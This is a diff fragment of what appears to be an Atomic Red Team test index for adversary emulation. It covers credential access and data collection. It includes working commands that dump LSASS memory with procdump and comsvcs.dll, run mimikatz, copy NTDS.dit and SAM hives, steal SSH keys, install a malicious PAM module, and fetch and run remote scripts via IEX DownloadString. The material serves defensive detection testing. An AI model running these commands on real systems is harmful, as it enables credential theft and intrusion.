' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: 'setspn -T #{domain_name} -Q */* -' + ' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 
@@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined -' + ' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually -' + ' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed -' + ' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' -' + ' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" -' + ' supported_platforms: - linux executor: 
@@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. -' + ' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND -' + ' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell -' + ' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} -' + ' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. -' + ' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" -' + ' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ -' + ' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd -' + ' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi -' + ' get_prereq_command: 'echo "" -' + ' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd -' + ' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) -' + ' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full -' + ' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) -' + ' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump 
@@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) -' + ' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" -' + ' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) -' + ' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) -' + ' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" -' + ' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" -' + ' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit -' + ' name: command_prompt elevation_required: true - name: LSASS read with pypykatz 
@@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live lsa -' + ' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) -' + ' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul -' + ' name: command_prompt elevation_required: true - name: Powershell Mimikatz 
@@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds -' + ' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 -' + ' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" -' + ' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe -' + ' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1557: 
@@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' - description: 'Volume shadow copy must exist -' + ' prereq_command: 'if not exist #{vsc_name} (exit /b 1) -' + ' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement -' + ' - description: 'Extract path must exist -' + ' prereq_command: 'if not exist #{extract_path} (exit /b 1) -' + ' get_prereq_command: 'mkdir #{extract_path} -' + ' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller -' + ' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT -' + ' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually -' + ' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin -' + ' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief -' + ' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) -' + ' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} -' + ' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell 
@@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. -' + ' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; -' + ' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". -' + ' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. -' + ' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 -' + ' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) -' + ' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. -' + ' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) -' + ' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host "You must provide your own password filter dll" -' + ' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller -' + ' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos -' + ' supported_platforms: - windows input_arguments: 
@@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. -' + ' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. -' + ' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo -' + ' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. -' + ' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo -' + ' executor: elevation_required: true command: | 
@@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target -' + ' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt -' + ' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) -' + ' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat -' + ' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL -' + ' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module -' + ' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi -' + ' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) -' + ' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} -' + ' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} -' + ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} -' + ' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key -' + ' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. -' + ' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} -' + ' cleanup_command: 'rm #{output_file} -' + ' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. -' + ' supported_platforms: - linux input_arguments: 
@@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} -' + ' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. -' + ' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} -' + ' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force 
@@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. -' + ' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist -' + ' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python -' + ' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 'echo "Python 2.7+ or 3.4+ must be installed" -' + ' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" -' + ' T1606.002: technique: external_references: 
@@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. -' + ' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AADInternals -Force -' + ' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials -' + ' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'pypykatz must be installed and part of PATH -' + ' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz -' + ' executor: command: 'pypykatz live registry -' + ' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} -' + ' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 -' + ' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File -' + ' supported_platforms: - windows input_arguments: 
@@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} -' + ' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files -' + ' supported_platforms: - linux input_arguments: 
@@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which python`; $which_python -V -' + ' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" -' + ' cleanup_command: 'rm #{path_to_output_file} -' + ' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files -' + ' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python -' + ' prereq_command: 'which_python=`which 